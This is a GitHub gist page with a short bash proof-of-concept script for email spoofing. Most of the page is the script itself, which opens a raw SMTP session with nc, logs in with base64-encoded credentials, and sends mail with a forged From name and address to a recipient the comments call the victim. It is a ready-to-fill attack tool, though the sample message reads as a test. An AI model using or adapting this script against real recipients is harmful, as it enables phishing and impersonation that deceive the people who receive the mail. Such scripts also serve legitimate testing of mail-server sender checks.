Skip to content

Instantly share code, notes, and snippets.

@trimkadriu

trimkadriu/mail-spoof.sh

Last active March 28, 2023 10:53
Show Gist options
  • Star 3 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save trimkadriu/f989c73f50479a290c203146f3df2033 to your computer and use it in GitHub Desktop.
Save trimkadriu/f989c73f50479a290c203146f3df2033 to your computer and use it in GitHub Desktop.
Download ZIP
Email Spoofing PoC
Raw
mail-spoof.sh
#!/bin/bash
# Mail Server Config
mail_server_ip="" # SMTP server
mail_server_port="25"
mail_server_username="" # SMTP username
mail_server_password="" # SMTP password
mail_server_legit_email="noreply@<yoursmtp>.com" # The `Mail from` value of SMTP Envelope (not what victim see)
# Email params config
email_recipient="" # Victims email
email_sender_email="" # Spoofed sender email
email_sender_name="" # Spoofed sender name
email_subject="Email Spoofing Test" # Message subject
email_body="This is just a test message, please ignore" # Message content
# Start SMTP and send the email
nc ${mail_server_ip} ${mail_server_port} << EOF
ehlo
auth login
$(printf "$mail_server_username" | base64)
$(printf "$mail_server_password" | base64)
mail from:${mail_server_legit_email}
rcpt to:${email_recipient}
data
From:${email_sender_name}<${email_sender_email}>
To:${email_recipient}
subject:${email_subject}
${email_body}
.
quit
EOF
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment